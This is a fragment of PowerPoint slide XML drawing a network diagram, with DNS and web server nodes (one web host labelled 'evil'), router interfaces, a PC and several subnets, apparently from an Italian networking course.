                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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71" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67217FCD-89DA-1F98-9B3A-9FE6FAC025BE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 1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4">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9265" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50325560-945A-7101-E89F-CABD34E8BB8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2881" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9272" name="Connettore diritto 9271">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F49ECF16-691D-A72A-3108-0BDC78FAEB1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2670433" y="3667061"/>
            <a:ext cx="248187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4" name="Connettore diritto 9273">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C5E6C1F-061B-BA9B-96E7-748866FD810C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="41" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2788398" y="4164547"/>
            <a:ext cx="2388820" cy="154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278" name="Gruppo 9277">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C81F03-65DC-CB4D-B459-3C49FB6A9F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2180000" y="3348604"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9279" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68565139-00C1-BFD4-74F2-CFAFB5EE91AB}"/>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9280" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3DA903A-D9B6-2050-D677-D22BD37F2990}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="9281" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F8C50E-9D84-FA9F-D81B-EC90C331695F}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9282" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2258845B-8F1D-F20A-9E23-37DBC156E437}"/>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dnsroot</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9283" name="Gruppo 9282">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5E718AB-4E62-4D58-D9CF-5C9ADA41DB57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6310508" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9284" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D73B15C-F679-12AD-3606-33EEF1C205D0}"/>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9285" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17A563EB-6786-153F-D84A-7E75D91EE3A4}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="9286" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F01BB9-BEE4-1A21-4C6E-39872E85EE0B}"/>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DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9287" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5757FA4B-8B35-163C-3CAE-EA6AF1AFFE5E}"/>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dnsuni</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9288" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3867FF8D-A655-1F71-C524-71AFBC68A321}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3087815" y="3547893"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9289" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BEB334-E9B6-E2EF-B99A-87142E24E75A}"/>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90" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9985F884-5AA2-7EBE-7E7F-4A739A1C3315}"/>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5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9291" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3E83C0F-12A1-036D-B2EE-A5A1702B592B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3109411" y="4016212"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9292" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6391DD38-26B7-3CD7-3716-09CFBCF9B56E}"/>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93" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7977DCF-1E5B-F11C-FB86-D1145F720409}"/>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
        <p:nvSpPr>
          <p:cNvPr id="9295" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FC78CFA-FB4F-6177-0E61-0B4870171041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076643" y="3780075"/>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C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9296" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3628DF88-B52E-1BC8-E9C6-880486D9C021}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="3761897"/>
            <a:ext cx="106631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10.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9300" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0828F821-CD0C-DE19-7DC0-AAC7BA328D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1245708" y="2923524"/>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E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9302" name="Group 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43685EBF-BF6E-8E65-9813-CEF603A5A986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4936638" y="5924428"/>
            <a:ext cx="576790" cy="613456"/>
            <a:chOff x="1429" y="1064"/>
            <a:chExt cx="818" cy="870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9303" name="Picture 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A467F662-F144-1FAF-530C-CBCF27345A1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04" name="Text Box 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{304D80ED-CF91-8F1F-1608-557E18B7A5DE}"/>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pc4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9309" name="Gruppo 9308">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E4168A7-9620-4975-D8C3-247C1FC1FAD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1862910" y="1768735"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9310" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB133FA7-7096-4C0E-1FCE-893B5043F991}"/>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evil</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9311" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AFB4237-5E60-DACE-EEA9-0BB455A6A309}"/>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9312" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35E3B52C-351B-4813-8092-F162E32843E7}"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9313" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B676A95C-8C79-C516-3766-8FFA3D942021}"/>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WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9314" name="Connettore diritto 9313">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4373293-0245-6933-B19B-5731A1A1269A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9310" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2316509" y="2363536"/>
            <a:ext cx="9207" cy="6703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19" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{761B5773-60A2-C219-9C90-5E8EBBAB2793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2155594" y="2539339"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9320" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83BD45B8-4095-A029-BCAD-838CC2288EAC}"/>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321" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7365298-B5E2-7328-D9FE-4DAF692D7934}"/>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50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9325" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2A517E6-55D2-CE18-FD06-7F5886A23D0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="782820" y="3413145"/>
            <a:ext cx="114646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210.0.3.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9329" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC71D0C-A32F-2CE3-F875-D58D88D94529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3573491" y="2906075"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9330" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCBE8FF-5833-1236-832A-4C81B93A9DB0}"/>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eth2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9331" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E960DB1F-1B4A-98F8-C3F5-E12F5F7CCDCC}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CDAA901-6F2E-890C-44B3-3DDCA11941C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3229794" y="5118807"/>
            <a:ext cx="0" cy="118746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28" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7754F259-A1D9-955B-F397-6AC93FEFE41C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3119449" y="6295882"/>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D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78994F8A-BFFF-05FB-211B-5253E1605B64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="864519" y="6199275"/>
            <a:ext cx="1467069"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192.168.100.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD0B4974-C0B9-354E-86B8-C93107C15215}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2241803" y="5652867"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B83EC76-561E-0992-5139-DCA34C135C14}"/>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23" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10BBA40B-7057-CD64-1D1D-8BF473E6D842}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9224" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256042A3-DDE6-AB00-4E3B-D75B17C9A59C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4024669" y="6030411"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9225" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E01395D-F053-DDD3-6BAD-22C5A0303667}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9226" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21EAFAD0-A1CC-3171-9EDB-B8B88DD4F428}"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Connettore diritto 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D459B28-2328-7F4A-61E8-4CDB2F17FF51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9308" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5366875" y="6141062"/>
            <a:ext cx="4350116" cy="1844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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F53608-767F-485F-C868-C580B85E0554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9562193" y="2923524"/>
            <a:ext cx="441381" cy="243680"/>
